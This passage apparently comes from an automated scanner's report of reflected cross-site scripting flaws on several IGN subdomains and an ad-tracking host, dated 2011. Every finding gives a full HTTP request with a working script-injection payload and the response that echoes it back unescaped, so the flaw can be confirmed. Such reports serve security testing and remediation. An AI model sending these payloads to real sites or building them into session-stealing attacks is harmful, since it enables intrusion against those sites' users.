Date: Mon, 07 Feb 2011 01:21:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26954-1317642609-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:47 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041707435v-1n-12mc+1297041707435mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 112882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/videos.html?c8eb3"><script>alert(1)</script>721f950aac5=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.171. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/videos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c60d1"-alert(1)-"123e4cb45b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/videos.html?c60d1"-alert(1)-"123e4cb45b9=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-360702473-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041710275v-1n-12mc+1297041710275mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 112814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/videos.html?c60d1"-alert(1)-"123e4cb45b9=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.172. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /objects/059/059687.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07f8"><script>alert(1)</script>136d9961b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/059/059687.html?e07f8"><script>alert(1)</script>136d9961b03=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 118399
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=2970f7kbs53pj;Path=/includes
Set-Cookie: freq=c-1297043278645v-1n-12mc+1297043278645mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27365-1401115047-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Expires: Mon, 07 Feb 2011 01:47:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN: Pokemon Black
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/objects/059/059687.html?e07f8"><script>alert(1)</script>136d9961b03=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.173. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /objects/059/059687.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a09"-alert(1)-"18ec3e4fdb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/059/059687.html?82a09"-alert(1)-"18ec3e4fdb2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 120076
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=3fvn4u7p2noep;Path=/includes
Set-Cookie: freq=c-1297043289591v-1n-12mc+1297043289591mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-729123278-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:48:09 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Expires: Mon, 07 Feb 2011 01:48:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:48:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN: Pokemon Black
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/objects/059/059687.html?82a09"-alert(1)-"18ec3e4fdb2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.174. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18b7"><script>alert(1)</script>d701efb97e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d18b7"><script>alert(1)</script>d701efb97e5=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:49:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:49:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-974111085-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:49:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043380824v-1n-12mc+1297043380824mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://dvd.ign.com/?d18b7"><script>alert(1)</script>d701efb97e5=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.175. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98877"-alert(1)-"62dc08d6dae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?98877"-alert(1)-"62dc08d6dae=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:49:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1201846334-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:49:43 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043383679v-1n-12mc+1297043383679mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://dvd.ign.com/?98877"-alert(1)-"62dc08d6dae=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.176. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d26b"-alert(1)-"5d785c7f042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/release.html?6d26b"-alert(1)-"5d785c7f042=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:50:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-1001102404-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:13 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043413934v-1n-12mc+1297043413934mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=fdgaqjdz72i3;Path=/indx
Set-Cookie: JSESSIONID=3qsvk7ar2sowh;Path=/indx
Set-Cookie: JSESSIONID=1029h8uslvbal;Path=/indx
Content-Length: 222290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://dvd.ign.com/index/release.html?6d26b"-alert(1)-"5d785c7f042=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.177. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 272ae"><script>alert(1)</script>2d5abbeb6e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/release.html?272ae"><script>alert(1)</script>2d5abbeb6e2=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:50:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:50:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-32430-1003246332-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043407204v-1n-12mc+1297043407204mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=1yxvkyx552l5q;Path=/indx
Set-Cookie: JSESSIONID=f4octo3p73bns;Path=/indx
Set-Cookie: JSESSIONID=60b9bm0j3f2sg;Path=/indx
Content-Length: 222502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://dvd.ign.com/index/release.html?272ae"><script>alert(1)</script>2d5abbeb6e2=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.178. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b642f"-alert(1)-"3e53dda3679 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?b642f"-alert(1)-"3e53dda3679=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:49:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:49:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1999751353-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:49:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043345779v-1n-12mc+1297043345779mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://dvd.ign.com/index/reviews.html?b642f"-alert(1)-"3e53dda3679=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.179. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0437"><script>alert(1)</script>5e965407bab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?e0437"><script>alert(1)</script>5e965407bab=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:48:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:48:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-301783746-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:48:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043338712v-1n-12mc+1297043338712mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://dvd.ign.com/index/reviews.html?e0437"><script>alert(1)</script>5e965407bab=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.180. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 80c1a<script>alert(1)</script>e55540c1d1a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&uid=amRZRPmRXMjwy5CP_17780c1a<script>alert(1)</script>e55540c1d1a&xy=0%2C0&wh=300%2C250&vchannel=177&cid=Tribal%20Fusion&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.1&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E3651A1AA59DADE1B8CFA9A237B00BEB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 142
Date: Mon, 07 Feb 2011 01:03:52 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_17780c1a<script>alert(1)</script>e55540c1d1a");

1.181. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be29"-alert(1)-"60680a1de34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?7be29"-alert(1)-"60680a1de34=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15004-1134624784-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043449492v-1n-12mc+1297043449492mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 134315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/?7be29"-alert(1)-"60680a1de34=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.182. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af47c"><script>alert(1)</script>c0300f37c7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af47c"><script>alert(1)</script>c0300f37c7e=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:46 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-1220699879-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043446397v-1n-12mc+1297043446397mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 134390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/?af47c"><script>alert(1)</script>c0300f37c7e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.183. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /ftp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b48"><script>alert(1)</script>efed23619dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ftp.html?35b48"><script>alert(1)</script>efed23619dd=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:56 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-584603399-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:56 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043456781v-1n-12mc+1297043456781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/ftp.html?35b48"><script>alert(1)</script>efed23619dd=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.184. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /ftp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce97b"-alert(1)-"e2eae7445aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ftp.html?ce97b"-alert(1)-"e2eae7445aa=1 HTTP/1.1
